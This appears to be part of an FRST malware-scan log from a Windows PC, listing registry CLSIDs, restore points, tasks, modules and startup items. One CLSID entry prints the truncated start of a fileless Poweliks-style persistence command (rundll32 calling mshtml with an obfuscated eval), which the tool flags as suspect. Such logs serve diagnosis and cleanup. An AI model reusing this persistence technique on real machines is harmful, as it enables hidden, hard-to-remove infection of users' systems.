CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2B8CDD04-8362-3A61-9B63-EC81420660C0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2DBA2186-EF21-3F3D-9CFB-5BF6DCF25033}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2DF1F61C-F3E8-389B-8ED1-43CB730D4B1B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{30641C81-F598-3FDF-92F7-533A6BD583D8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{363E6FFC-356F-336B-9603-D18DD89BB467}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{36F46B2D-E21B-3596-AC3A-4571C6AE860A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{383C94DE-A44C-3797-8D64-ACADF5674A26}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{387A1CD6-F50C-44FB-A7EA-F75D30D7A97F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{39E91280-1847-3A1C-8A47-5184F46E3A13}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{3B24BA91-8C3E-3EC4-B826-52D8C96728E2}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{3BAAAA84-78E2-398D-A121-8D99F410D18E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{3EBFE219-45D6-35F9-8DDF-1541AD510CB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{3F68BBEB-0B8B-3B24-BBFD-010BB3863E5A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{41B58D9B-1466-3534-B9CF-ABFBF0E01497}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{45694048-12CD-3955-B3A6-6421E838EF07}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4614FD5F-E173-32A3-A51C-FECE7F49EF63}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{47881152-4D8A-36E9-A24B-1CA70F59EE76}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{47BD9AAC-EEA1-3FC7-A018-773D50510A76}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{481DEACC-30B8-3F97-A977-1DDA68B0079A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{48D01E5B-8CFB-3C28-ADAC-76378A5988DA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4A66387D-0DDE-307C-A1AD-FC30A4C74E8A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4BB3F9DD-DE20-37E8-AE2A-B4DDE25B1028}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4BDE841C-BB63-3052-89E0-BD9CDED34C18}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4C1695C6-8CC6-33DE-9602-D08E362459E8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4D6F1061-763F-3C80-AB08-32F04A3F838B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4D73F17A-8088-399E-B02D-2F2944110BDD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4F60C2CF-A617-31F9-A6B2-E35CB0DAE0E5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5321670B-8407-3998-86AA-228D78C128C7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{55F27E2B-DE74-3EED-BD20-CBECE5A117E1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{57076BCB-E627-31C6-8EE9-30D3AB0895DF}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{587E0510-7EB8-3599-85BC-F4962BD1DFB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{587F181A-5CEF-383C-9DC8-D9ABF5CEB1AC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5978A4C6-118E-3F57-A425-65E391B76C31}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5A7CD925-9137-3A3F-A543-DA436A3137AD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5B330AAB-0460-31C6-9C85-22BF15EAC2CB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5B72D367-E84F-3E94-B304-31B028D87BEA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5BE1CBDA-7B78-3990-8E05-0377B29D49A7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5D0CE54B-6079-318B-8EEB-20D249A84351}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5E076B60-76EB-3E07-8F69-82EE2642930A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5FCEDC9E-9389-3A05-8455-3B225C51806F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{60AD41B4-6868-3EA3-8B57-A45930264327}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{61683280-8AC4-3981-BFBB-1004BCC37891}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{64AA1680-B0AD-3982-9F3A-924934552303}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{64F46A4A-9035-3B06-8DD6-87541CA8C3BA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{671C8C4D-93CC-38E2-BC04-24010E0337EE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{67A2A120-A312-3212-BE67-CC7476D827CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{691958C5-FE10-31D6-9874-980096EC8446}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{6E8A23DE-97C1-331D-A789-E1E4AE2C197E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{700A43B3-EF3C-3B56-A247-591454BDAEBC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{720F6709-13E4-37CB-838B-7BA4FBAA63EB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{733BCCDC-92E5-3751-95F4-F45184D8B2CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{769E7ECC-E57C-392D-BEB3-F25384BD8D25}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{7EDD8B4A-CB15-3DAC-AFFB-0BD4044CDDC1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{80E94B46-F2A1-3657-A246-D60FB6807135}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{822AA8AB-2123-4775-9AED-99D721F01F3F}\InprocServer32 -> C:\Users\scalac\AppData\Local\NEC\UC700 Outlook Calendar Link\adxloader.dll ()
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{8378A528-0596-3A5D-BF28-B7C56D54E252}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{8C93355E-631C-32DF-B144-06CAE92FBFBA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{92036FFB-8CFC-394D-B57C-062C39EB343B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{93C557D7-77E5-3A51-BAAB-36775F2DCEF4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{94F656C1-A93B-3407-93C5-11D9CF37A8A1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{980BAAE7-775C-3DC9-9C4A-03D86AC7A267}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{9C1BC9ED-7948-3058-AFE6-96156B017922}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{9CF1E5F4-3520-3488-8EDB-E56627329B15}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{9D39DA6C-6342-34DC-B1A1-C7B844CD71A4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{9E29DB84-9BF6-3F56-BE2C-609F0629E0C3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{A0CAE551-D8C3-3F13-86C3-D96DACEB90A7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{A14EBAA2-383F-3C3E-88D3-AD908906F029}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{AA073870-297C-3996-B178-D92EBF4A820F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{AC7C43EC-860C-3F42-BC0D-8EF45F779604}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{B293E074-3911-36CD-B8B4-EF9FF0CE4F27}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{B4627868-756A-324D-A382-C8D5A0E84F34}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{B7326381-9491-3CA7-B151-C14B79EF5AAA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{B7EB8647-DA5A-38EF-A998-F907D1F175E9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{BA389EEB-555A-3EFA-9C9E-BCA78C2F00F5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{BBCD766F-F898-3AA9-B1C2-3EC8E03AF1FF}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{BC0DC794-79CE-3966-94CE-D10AD98D74CE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{BDE21E90-7A2A-34A6-8056-565F29D87CC1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{C51B2538-0835-3874-9BFB-46FC58C2CEF0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{C755FC48-C25A-39A3-9D17-DABA6A837C0B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{C9408795-4789-3247-9878-5BBB2B260426}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{CB06F05C-5B82-322F-A104-A43AC8E6A507}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{CBA462B6-DFDE-3490-A03A-88A8159892E2}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{CE3F5A92-FB88-3DAC-8C4D-8BC47605B13E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D0C0115C-7387-318F-9CD0-CBA89258490C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D23A02EC-3B94-3656-A0D7-4D20E021429D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D3763356-D8E2-3F2B-873A-45293FA1748C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D65E651C-A186-3E1D-B2A2-729FF6E96E64}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D9B65A9D-4D80-3DA8-AD8F-E6244BB3C4D8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{DC533F21-FF77-3473-BF2C-0769F7A83D2A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{DC8E1398-415F-34DE-81DC-89B74F824F26}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E052CB22-822B-3381-87AF-4428A503F794}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E1545F49-0A1C-332A-94B1-7010FEDBD131}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E41DEB76-7F0D-3743-A878-CA509646CDF3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E60923A5-3485-38D5-A201-337AD6F28984}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E63074A1-0765-3FAA-88F3-4FA40D41D5B5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{EA7FE6A2-35F7-3066-8B62-DB0AF7264BB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{EE25F13B-19A8-3646-95DC-D5010DA28F60}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{EE315693-6260-3D46-A33B-1D56734ADC31}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{EFF925C0-119E-375D-AA94-EFA14E4E30B1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F2EF6333-5EEB-4FA2-94A9-FB64BA72CE5A}\InprocServer32 -> C:\Users\scalac\AppData\Local\NEC\UC700 Office Smart Tag\adxloader.dll ()
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F3B35FC5-F2B6-3554-9CA7-FC53A334D4EE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F59222E3-CEAB-3E88-BB20-86FDA1BD3B3D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F6F3E3D1-ADEE-38ED-ADAA-F06B3A89618C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F836AB74-CCE9-4A88-BC30-330952ED4DC1}\InprocServer32 -> C:\Users\scalac\AppData\Local\NEC\UC700 Office Smart Tag\adxloader.dll ()
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F867AC2B-EB4C-3E31-8725-3A89EF955007}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{FB0696C8-987D-3007-A983-6BEAC40D45D4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{FD6EE631-0989-3FBE-A27A-645937B384A9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{FDA83E81-92AC-3E77-9FC5-B883CB075D2F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{FF5549C1-1B1B-3F2B-BFE9-D458087A1F52}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)

==================== Restore Points  =========================

16-10-2014 16:05:00 Windows Update
16-10-2014 16:05:50 Windows Update
16-10-2014 16:06:56 Windows Update
16-10-2014 16:09:58 Windows Update
16-10-2014 16:11:43 Windows Update
16-10-2014 16:13:56 Windows Update
17-10-2014 12:03:25 Windows Update
17-10-2014 13:01:47 Windows Update
30-10-2014 12:45:31 Scheduled Checkpoint
31-10-2014 13:04:38 Malwarebytes Anti-Rootkit Restore Point

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:04 - 2014-10-23 12:41 - 00000027 ____N C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {69BB7B30-9B86-4AAC-A03B-1053B2CC164B} - System32\Tasks\Microsoft\Windows\Work Folders\Work Folders Maintenance Work => C:\Windows\system32\WorkFoldersSystemTray.exe [2014-04-08] (Microsoft Corporation)
Task: {805A0719-FE2D-4177-92C0-568EB845F69D} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-10-29] (Piriform Ltd)
Task: {B585DF04-F9C8-49A1-9251-BC55B61DCE43} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-10-23] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2012-12-06 15:54 - 2012-08-31 15:01 - 00151552 _____ () C:\Windows\System32\HP1100LM.DLL
2013-02-27 16:16 - 2011-12-12 11:48 - 00014616 _____ () C:\Windows\System32\sphonepdfmonpro.dll
2012-12-06 15:54 - 2012-08-31 15:01 - 00069632 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\HP1100PP.DLL
2010-09-27 11:03 - 2010-09-27 11:03 - 00201512 _____ () C:\Windows\system32\vpnapi.dll
2012-12-06 15:54 - 2012-08-31 15:02 - 02306048 _____ () C:\Windows\system32\spool\DRIVERS\W32X86\3\hp1100su.dll
2012-12-06 15:54 - 2012-08-31 15:01 - 00794624 _____ () C:\Windows\system32\spool\DRIVERS\W32X86\3\HP1100GC.dll
2014-07-23 15:13 - 2014-05-27 07:24 - 00434512 _____ () C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\AeXWiseRuleProvider.dll
2012-05-31 10:26 - 2012-02-17 19:55 - 00166912 _____ () C:\Program Files\WinRAR\rarext.dll
2011-08-31 19:13 - 2011-08-31 19:13 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll
2014-10-30 14:19 - 2014-10-30 14:19 - 03649648 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\scalac\Downloads\launch (1).ica:icasource
AlternateDataStreams: C:\Users\scalac\Downloads\launch.ica:icasource

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\42665744.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\42665744.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: BeFrugal.com Service => 2
MSCONFIG\Services: O2FLASH => 2
MSCONFIG\Services: O2SDIOAssist => 2
MSCONFIG\Services: SP350.PriorityPolicer => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^VPN Client.lnk => C:\Windows\pss\VPN Client.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AIM for Windows => "C:\Users\scalac\AppData\Local\AOL\AIM\aim.exe"
